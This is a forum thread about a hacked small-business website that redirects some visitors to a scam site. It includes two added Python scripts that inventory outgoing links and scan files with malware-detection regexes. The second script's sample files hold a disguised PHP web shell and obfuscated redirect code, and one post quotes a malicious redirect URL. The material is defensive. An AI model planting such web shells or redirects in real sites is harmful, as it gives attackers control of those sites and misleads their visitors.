  • how to detect hidden malicious links on website?

    Posted by Vincenzo on the AskWoody Lounge


      • #2296614 Vincenzo (AskWoody Lounger)

        Google is sending emails that our website has some links on it that are redirecting visitors, or directing them to malicious sites when clicked.
        Can anyone recommend software that will scan a site and list any outgoing links it finds?
        Thanks

      • #2296665 Paul T (AskWoody MVP)

        Google is sending email on your behalf? From your website? Are you sure the email is from Google and not a scammer?

        What sort of links? Are they links on your site?

        cheers, Paul

      • #2296674 Alex5723 (AskWoody Plus)
      • #2296677 doriel (AskWoody Lounger)

        What about VirusTotal?
        Personally I use that if I'm not sure, and I believe it's a good tool.

        Dell Latitude E6530, Intel Core i5 @ 2.6 GHz, 4GB RAM, W10 1809 Enterprise

        HAL3000, AMD Athlon 200GE @ 3,4 GHz, 8GB RAM, Fedora 29

      • #2296680 OH_dutch (AskWoody Lounger)

        I have to agree that the question could be more clearly expressed, and others are posting links to try. My professional opinion for browsing someone else’s website:

        •  Modern web browsers will display a hyperlink’s resolution address, or URL, when the link is hovered over. If the link’s domain differs from the one in the text, odds are it’s trouble-in-River-City. When in doubt I will email the site webmaster to confirm its validity.

        And for received mail:

        •  Ensure that your personal network, and PCs, stay current on software patches in order to reduce known gotchas.
        •  Ensure that your PC(s) have firewalls turned on. The default Windows Defender is not fancy but certainly works to divert many attacks.
        •  Your browser is likely to divert suspected spam mail, including mail addressed in a bulk distribution list.
        •  Distrust all hyperlinks in any email until you are satisfied that they are legitimate. You may reach out to the sender and request confirmation. For example, a vendor’s disclaimer might mention that their legitimate email will never ask the customer to reply with PII as “confirmation”.

        To drive home the lesson, my (large federal contractor) employer will periodically slip in official-looking mail that includes a benign bomb. Eventually I wised up and created an email rule to quarantine almost all inbound mail. There is an exception clause that provides a whitelist of accepted domains. A similar rule could catch all inbound mail having attachments.

        Good luck from a Dutch Uncle!

        • #2296687 doriel (AskWoody Lounger)

          Your desire

          software that will scan a site and list any outgoing links it finds

          requires specialized SW I think. You say

          Google is sending emails that our website has some links on it

          I suppose you use some CMS (Drupal, WP, ...). I would open the source code and count how many times “href” is found. Could this do the job? Did you put some of these links there? Are you aware that your web site is redirecting users?

          If the link’s domain differs from the one in the text, odds are it’s trouble-in-River-City. When in doubt I will email the site webmaster to confirm its validity.

          That is true. Unfortunately, my experience is that websites regularly redirect to display ads to you. If you are aware that there are ads on the website, this method is not 100% valid. But if the linked domain is suspicious, leave the webpage.

          Another tip: install the DuckDuckGo Privacy Essentials extension in your browser. In the top right corner of the address field there will be a small button which immediately tells you the security rating of the webpage and its risks. Woody gets B+, which is not bad at all.


          Appendix:
          When opening attachments, its highly recommended to have displayed file extensions!
          Example: you get a picture in the email. You download it. In the Downloads folder there is a file

          PIC.jpeg

          but if you unhide extensions, you will see

          PIC.jpeg.exe

          And that is definitely fraud; don't click it.

      • #2296695 satrow (AskWoody MVP)

        First analyse and trace the email headers to ensure they’re genuine:
        https://support.google.com/mail/answer/29436?hl=en
        https://whatismyipaddress.com/email-header
        https://mxtoolbox.com/EmailHeaders.aspx

        Where/what are you hosting your website from, a remote host, local host, a computer at your home/work?

      • #2296737 Vincenzo (AskWoody Lounger)

        Thanks for the replies.
        Sorry, I could have given more details.

        The site is hosted on a shared server on Godaddy.

        The person doing SEO on the site has a Google Ad campaign in place. The ads have been running for a while with no problem.
        Last week Google sent her several emails saying they had suspended the campaign, here is the message:

        “Our latest scan from your site came back, and still detects Malware/links that are potentially harmful to you and to the site visitors. It seems that your site (landing page) redirects users to malicious links OR triggered when clicked.”

        Then they listed 3 links, supposedly on the homepage/landing page (we don’t have a specific landing page other than the homepage) to sites we’ve never heard of.

        So the Google emails are genuine, they are not the problem. Problem is the malicious links Google is detecting.

        I manually went through the site, did not see any obvious issues. I also scanned with Sucuri, the Google Transparency Report, and VirusTotal.

        I installed an extension on Chrome that lists all the outgoing links on page. That came up with no unexpected links on the homepage.

        I also checked the site with the Google Search Console, it showed no problems. But it is limited in what it detects.
        (Oddly, Google provides a link to this page https://support.google.com/webmasters/answer/3258249 which details how to get details from the Search Console on what malicious files they detected. But it shows “No Issues Detected”.)
        (The emails from Google listing the problems do appear genuine.)

        As far as actual experience on the site, it works fine on the computers I’ve tested it on, using 3 browsers on each. But on two iPhones, the redirect did happen to a 3rd party site. It happened once on my iPhone, once on another iPhone, and then not again. Yet.

        What I have not done yet is go through the files in the site looking for href instances that provide clues. I am hoping to find software that will make that task easier.

        Thanks
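The outgoing-link inventory asked for at the top of the thread, and the "go through the files looking for href instances" Vincenzo describes here, can be done with a short script instead of a browser extension. The following is an added example, not code from anyone in the thread: it parses a page's HTML with Python's standard library, resolves every href, src, form action and meta-refresh target against the page URL, lists the hosts that are not the site's own domain or a subdomain of it, and flags inline scripts that assign to `location` or decode strings with `atob()`, decoding those literals so the hidden destination is readable. The HTML, the domain `example-site.com` and every host in the sample are constructed for the example; to use it for real, feed it the saved source of the homepage (curl output or the view-source text). Like any check made from your own machine, it only sees the HTML you were served; a redirect that is only sent to some visitors, or that a remote script performs after load, will not be in that copy.

```python
# Added example: stdlib-only inventory of a page's outgoing references.
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes that carry a URL, per tag. Other tags are ignored.
URL_ATTRS = {"a": ("href",), "link": ("href",), "script": ("src",),
             "iframe": ("src",), "img": ("src",), "form": ("action",)}
# Inline-script constructs worth a second look: client-side redirects and the
# string decoding commonly used to hide the destination.
SUSPICIOUS_JS = re.compile(
    r"location\s*(?:\.href|\.replace|\.assign|=)|\beval\s*\(|\batob\s*\(|"
    r"\bunescape\s*\(|document\.write\s*\(", re.I)
ATOB_LITERAL = re.compile(r"atob\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


class RefCollector(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.refs = []          # (tag, attribute, absolute URL)
        self.inline_js = []     # inline script bodies matching SUSPICIOUS_JS
        self._script = None     # text buffer while inside <script>...</script>

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        for attr in URL_ATTRS.get(tag, ()):
            if attrs.get(attr):
                self._add(tag, attr, attrs[attr])
        # <meta http-equiv="refresh" content="0;url=https://other.example/">
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", attrs.get("content", ""), re.I)
            if m:
                self._add("meta", "refresh", m.group(1))
        if tag == "script" and not attrs.get("src"):
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script).strip()
            if SUSPICIOUS_JS.search(body):
                self.inline_js.append(body)
            self._script = None

    def _add(self, tag, attr, raw):
        raw = raw.strip()
        if raw.lower().startswith(("javascript:", "mailto:", "tel:", "data:", "#")):
            return  # not navigable targets; keeps the third-party list honest
        self.refs.append((tag, attr, urljoin(self.page_url, raw)))


def extract_references(html, page_url):
    """Return ([(tag, attr, absolute_url), ...], [suspicious inline scripts])."""
    p = RefCollector(page_url)
    p.feed(html)
    p.close()
    return p.refs, p.inline_js


def external_hosts(refs, site_domain):
    """Referenced hosts that are neither site_domain nor one of its subdomains."""
    site_domain = site_domain.lower()
    hosts = set()
    for _tag, _attr, url in refs:
        host = (urlsplit(url).hostname or "").lower()
        if host and host != site_domain and not host.endswith("." + site_domain):
            hosts.add(host)
    return sorted(hosts)


def decode_atob_literals(js):
    """Decode base64 literals passed to atob() so the hidden string is readable."""
    out = []
    for blob in ATOB_LITERAL.findall(js):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except binascii.Error:
            pass
    return out


# Constructed sample (domain and hosts are assumptions): an ordinary page with
# two injected elements, a meta refresh and an inline redirect for iPhones.
SITE_DOMAIN = "example-site.com"
PAGE_URL = "https://www.example-site.com/"
SAMPLE_HTML = """<!doctype html><html><head><title>Home</title>
<link rel="stylesheet" href="/wp-content/themes/demo/style.css">
<script src="//static.cdn-example.net/jquery.min.js"></script>
<meta http-equiv="refresh" content="0;url=https://win-a-prize.example/?utm_campaign=x">
</head><body><a href="/about/">About</a> <a href="https://blog.example-site.com/">Blog</a>
<a href="mailto:hello@example-site.com">Mail</a> <a href="https://social.example/p">Follow</a>
<script>var u=atob("aHR0cHM6Ly9sYW5kZXIuZXhhbXBsZS8=");
if(/iPhone/.test(navigator.userAgent)){window.location.href=u;}</script></body></html>"""

if __name__ == "__main__":
    refs, scripts = extract_references(SAMPLE_HTML, PAGE_URL)
    print(external_hosts(refs, SITE_DOMAIN), [decode_atob_literals(s) for s in scripts])
```

On the sample this reports three third-party hosts (the CDN, the meta-refresh target and the social link) and one suspicious inline script whose `atob()` argument decodes to `https://lander.example/`. The third-party list will always contain legitimate entries such as a CDN or analytics host; the point is to have the complete list in one place so the one host nobody recognises stands out.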

      • #2296749 Vincenzo (AskWoody Lounger)

        One other thing. The SEO person recently started using GuildQuality, some sort of SEO service that provides valid testimonials. I am not familiar with it, but I asked her to remove all traces of it from the site. But Google rescanned the site and is still blocking its ads.

      • #2296751 Vincenzo (AskWoody Lounger)

        “Rip the site to your own PC and work through it locally: https://www.httrack.com/
        Thanks

        The problem i see doing that is that the site works fine for me online, I imagine it still would if I ripped it to my PC.
        I am depending on the Google Ad campaign scans to let me know where the problem is, at this point anyway. But getting details from them is difficult. When I make a change to the site and ask them to rescan, it takes a few days before I get the result back.

      • #2296759 Vincenzo (AskWoody Lounger)

        The site in question is ‘https:// www. get organized with bridges .com’.

        satrow edited: not redirecting to infect (no virus or other data-damaging code) but to an annoyance posing as a chance to win… whatever. The hosting server also serves adult-based ads. that look too good to be true, too (I’m just peeking into the code, right!). So, link broken, hope no-one got stuck there and that every winner receives their prize 🙂

      • #2296763 access-mdb (AskWoody MVP)

        Try checking with W3C linkchecker

      • #2296781 Vincenzo (AskWoody Lounger)

        Try checking with W3C linkchecker

        Thanks. Just tried it, nothing malicious or 3rd party comes up.

      • #2296954 Paul T (AskWoody MVP)

        If you are getting occasional redirects it suggests either a malicious script or DNS hijack.

        A malicious script won’t be spotted by an external check, you need to scan the server side files.

        DNS hijack would be more likely to be a permanent change, not intermittent, but you should be able to rule that out by testing from different external sites / countries.

        I’ve just used the link to your site and was instantly redirected to “https://insectr unfollow8.li ve/?ut m_campa ign=QPF8 euu28II5lw7O 2iHhCidoSOX mw5oLx D6bwphw 43U1&t=mai n9”. (I’ve added spaces to the link to prevent it being used from Woodys.)
        This site is listed as malware/spam on VirusTotal.
        The redirect makes it look like a malicious script.

        Note: I run my browser with javascript turned off.

        cheers, Paul

      • #2296969 satrow (AskWoody MVP)

        You can safely check the source of pages and some other types by prefixing the URL with (don’t click, copy!) http://view-source:FullURL but I can’t see how to show it on this platform, using it in a link breaks it as it adds a further https:// prefix.

        • #2296978 Alex5723 (AskWoody Plus)

          In Chrome you can open More Tools – Developer tools.

      • #2296984 Alex5723 (AskWoody Plus)

        On the redirected site, why?

        You can check for phishing, spam, privacy.... behavior.

        • #2296988 satrow (AskWoody MVP)

          Already done, want a DM with the content from your long lost Russian relatives?

          How would that help the OP?

          Diagnosed already.

      • #2297128 Vincenzo (AskWoody Lounger)

        I am somewhat surprised that you guys got re-directed since I have only seen it re-direct on the phone, and I’ve tried it from 3 browsers on 2 of my computers. I guess I should have disabled the link when I posted it, so it could not be accidentally clicked. Sorry.

        I am going to try some of the suggestions, also try it using a VPN to see if that makes it redirect. It’s hard to troubleshoot from my computer when I can’t make the issue appear.

      • #2297132 Vincenzo (AskWoody Lounger)

        A malicious script won’t be spotted by an external check, you need to scan the server side files.

        How would I do that?

        Thanks

      • #2297134 Vincenzo (AskWoody Lounger)

        Here’s something interesting. When I turn on the VPN in Norton and visit the site, I do get the re-directs. That’s the only time I’ve been able to see it myself on my computer. I see that the VPN made it appear like I am in North Carolina.

        Not sure what to make of that.

        I’ll try some of the above suggestions now.

        • #2297146 satrow (AskWoody MVP)

          Check your DM messages, there’s one that attempts to give clearer links to looking at page sources as code – it should help a lot.

          I’ve read reports that the redirect triggers on the first view but not subsequent, I’ve seen the opposite! So, it might be random or based on some ‘order’, expect the unexpected but look at the source code where you can before going in with standard URLs.

      • #2297181 Vincenzo (AskWoody Lounger)

        Check your DM messages, there’s one that attempts to give clearer links to looking at page sources as code – it should help a lot.

        Thanks, using your view-source: as a url prefix, I can finally see the redirect.

        Oddly it happens in Firefox but the site loads normally in Chrome.

        Any ideas on how to remove this redirect?

        Thanks

      • #2297182 Vincenzo (AskWoody Lounger)

        All I can see when I use that technique is the redirect, but I can’t see where it is located on the page so I could remove it.

        And why would the page even load correctly as it does in Chrome when the source code only shows the redirect??

        • #2297188 satrow (AskWoody MVP)

          Scripts, maybe browser UA, mouse action detection or something similar (do nothing unless…).

          The redirect is the page – provided you have fulfilled their criteria. If you haven’t, or you’re not vulnerable, you get the real page (maybe, I’ve not seen their script and probably wouldn’t understand it as it’s likely using min.js, or w/e compression is the latest ‘thing’).

          Wipe the site, fire your devs/staff/seo experts and claim comp. from them, check and tighten security obviously, reload the site from the original, or latest known-good copy, check security again…

      • #2297460 Paul T (AskWoody MVP)

        Agree with “fire your dev team and sue them”. There is no dev worthy of the name that would allow malicious scripts to be installed.

        You can get website apps that will scan your server pages for malicious scripts and check that you have valid packages installed, but this does require some knowledge on your part to install / maintain and it’s not free.

        If you have a backup of the site (if not, why not?) you can load it locally and scan the files using search in Windows Explorer for the site name, but it is probably encrypted / hidden to make it more difficult to detect.

        What you probably have is a single line that calls a javascript routine from a remote server. That allows the re-direct to be changed as required.

        cheers, Paul
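One way to do the server-side scan Paul T describes, as an added example that is not his or anyone else's code from the thread: a Python script that walks a local copy of the site (the UpdraftPlus backup, or an httrack rip), checks each line of each file against a few regexes for the patterns injected WordPress sites commonly carry (eval() of a base64 or gzinflate blob, eval() of request data, hex-escaped JavaScript strings, location assignments), reports every `<script src=>` that points at a host outside an allow-list, and flags PHP code in files whose extension says they are not PHP. The tree it scans is constructed in a temporary directory so the example runs offline; the allow-listed hosts, the file paths and every host name and payload in the sample files are assumptions. Matches are leads to inspect by hand, not proof of compromise: a theme's own JavaScript may legitimately assign to `location`. And finding the injected line is diagnosis, not the fix; the site still has to be restored from a known-good copy and the way in closed, or the code comes back.

```python
# Added example: regex triage of a local site copy for injected code.
import os
import re
import tempfile
from urllib.parse import urljoin, urlsplit

# Hosts that <script src=...> may legitimately load from (assumption). Relative
# src values are resolved against SITE_URL so they count as first-party.
KNOWN_SCRIPT_HOSTS = {"example-site.com", "www.example-site.com"}
SITE_URL = "https://www.example-site.com/"

# (rule name, regex) pairs applied line by line. Matches are leads, not proof.
RULES = [
    ("php eval of decoded blob", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("php eval of request data", re.compile(
        r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("long base64 literal", re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]")),
    ("hex-escaped js string", re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I)),
    ("js redirect", re.compile(
        r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=[^=]|"
        r"location\.(?:replace|assign)\s*\(", re.I)),
]
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
PHP_OPEN = re.compile(r"<\?php\b|<\?=")
PHP_EXT = {".php", ".phtml", ".inc"}


def scan_text(relpath, text):
    """Return [(relpath, lineno, rule, excerpt)] for one file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((relpath, lineno, name, line.strip()[:100]))
        for src in SCRIPT_SRC.findall(line):
            host = (urlsplit(urljoin(SITE_URL, src.strip())).hostname or "").lower()
            if host and host not in KNOWN_SCRIPT_HOSTS:
                findings.append((relpath, lineno, "remote script src: " + host, line.strip()[:100]))
    # A PHP open tag inside an .ico/.jpg/.txt file is code hidden where neither
    # humans nor simple scanners look; report it whatever the content.
    if os.path.splitext(relpath)[1].lower() not in PHP_EXT and PHP_OPEN.search(text):
        findings.append((relpath, 0, "php code in non-php file", ""))
    return findings


def scan_tree(root, max_bytes=2_000_000):
    """Walk root and scan every regular file up to max_bytes; paths are relative."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) > max_bytes:
                continue
            with open(path, "rb") as f:
                text = f.read().decode("utf-8", "replace")
            findings.extend(scan_text(os.path.relpath(path, root), text))
    return findings


def build_sample_site():
    """Write a constructed WordPress-like tree to a temp dir and return its path.

    Three of the four files carry the kind of injection the thread describes;
    all host names, paths and payloads are made up for the example."""
    files = {
        "index.php": ["<?php", "define('WP_USE_THEMES', true);",
                      "require __DIR__ . '/wp-blog-header.php';"],
        "wp-content/themes/demo/header.php": [
            "<?php /* theme header */ ?>",
            "<!doctype html><html><head>",
            '<script src="https://www.example-site.com/js/site.js"></script>',
            '<script src="//stat.counter-example.net/s.js"></script>',
            "<?php eval(base64_decode('aGVhZGVyKCJMb2NhdGlvbjogaHR0cHM6Ly9sYW5kZXIuZXhhbXBsZS8iKTs=')); ?>"],
        "wp-content/themes/demo/js/main.js": [
            r'var u = "\x68\x74\x74\x70\x73\x3a\x2f\x2f" + "lander.example/";',
            "if (/iPhone|iPad/.test(navigator.userAgent)) { window.location.href = u; }"],
        # a PHP web shell parked in the uploads folder under an image name
        "wp-content/uploads/2020/favicon.ico": [
            '<?php if (isset($_POST["x"])) { eval($_POST["x"]); } ?>'],
    }
    root = tempfile.mkdtemp(prefix="site-scan-")
    for rel, lines in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write("\n".join(lines) + "\n")
    return root


if __name__ == "__main__":
    for relpath, lineno, rule, excerpt in scan_tree(build_sample_site()):
        print(f"{relpath}:{lineno}: {rule}  {excerpt}")
```

Against the sample tree this reports six findings across three files and nothing for the clean `index.php`: the unknown script host and the `eval(base64_decode(...))` in the theme header, the hex-escaped string and the `location.href` assignment in the theme's JavaScript, and both the `eval($_POST[...])` and the PHP-in-an-image finding for the file in uploads. On a real backup, sort the output by file and compare the flagged files against a clean copy of the same theme and plugin versions; injected code is usually one added line in an otherwise unchanged file.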

      • #2297497 Vincenzo (AskWoody Lounger)

        Thanks for the input.

        There is no dev team. The site belongs to a friend of mine for her small business. I did install Updraft Plus backup previously, so there are current backups that can be restored. I am going to try the GoDaddy Security package first to see if that can detect it.

        Thanks
